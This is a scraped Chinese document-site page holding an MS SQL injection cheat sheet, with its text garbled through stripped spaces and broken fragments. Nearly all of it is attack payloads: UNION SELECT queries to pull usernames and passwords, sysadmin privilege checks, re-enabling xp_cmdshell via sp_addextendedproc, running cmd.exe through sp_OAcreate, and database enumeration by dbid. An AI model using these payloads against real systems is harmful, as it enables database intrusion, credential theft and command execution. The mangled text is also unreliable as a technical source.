资源描述:
《非常经典的ms sql注射资料--》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、非常经典的MsSql注射资料>> Sql注射总结(早源于'or'1'='1) 最重要的表名: select*fromsysobjects sysobjectsncsysobjects sysindexestsysindexes syscolumns systypes sysusers sysdatabases sysxlogins sysprocesses 最重要的一些用户名(默认sql数据库中存在着的) public dbo guest(一般禁止
2、,或者没权限) db_sercurityadmin ab_dlladmin 一些默认扩展 xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regedia驱动器相关 xp_dirtree目录 xp_enumdsnODBC连接 xp_loginconfig服务器安全模式信息 xp_ma
3、kecab创建压缩卷 xp_ntsec_enumdomainsdomain信息 xp_terminate_process终端进程,给出一个PID 例如:sp_addextendedproc'xp_pxp_foo.dll'execxp_and.asp-c-Slocalhost-Usa-Pfoobar'groupbyusers.idhaving1=1-'groupbyusers.id,users.username,users.passe')-unionselectTO
4、P1login_nameFROMlogintable-unionselectTOP1passe='Rahul'--构造语句:查询是否存在xp_cmdshell'unionselectversion,1,1,1--and1=(selectVERSION)and'sa'=(selectSystem_user)'unionselectret,1,1,1fromfoo--'unionselectmin(username),1,1,1fromuserse>&
5、#39;a'-'unionselectmin(username),1,1,1fromuserse>'admin'-'unionselectpassuserse='admin'--anduser_name()='dbo'and0<>(selectuser_name()-;DECLAREshellINTEXECSP_OAcreate'32cmd.exe/cusersaster.dbo.sysobjectse='
6、;xp_cmdshell');EXECmaster.dbo.sp_addextendedproc'xp_cmdshell','xplog70.dll'1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20e='xp_cmdshell')and1=(selectIS_SRVROLEMEMBER('sysadmin'))判断sa权限是否and0<>(selecttop1p
7、athsfromneefrommaster.dbo.1234567下一页>>>>这篇文章来自..,。sysdatabasesethodo,'run',NULL,'cscript.exec:ipubrootmkethodo,'run',NULL,'cscript.exec:ipubrootchaccess.vbs-amaster.dbo.sysdatabasese>1anddbid=6) 依次提交dbid=7,8,9....得到更多的数据库名 and0&
8、lt;>(selecttop1namefrombbs.dbo.sysobjectsin and0<>(selecttop1namefrombbs.dbo.sysobjectsenotin('Admin'))来得到其他的表。 and0<>(selectcount(*)frombbs.dbo.sysobjectse='admin' an
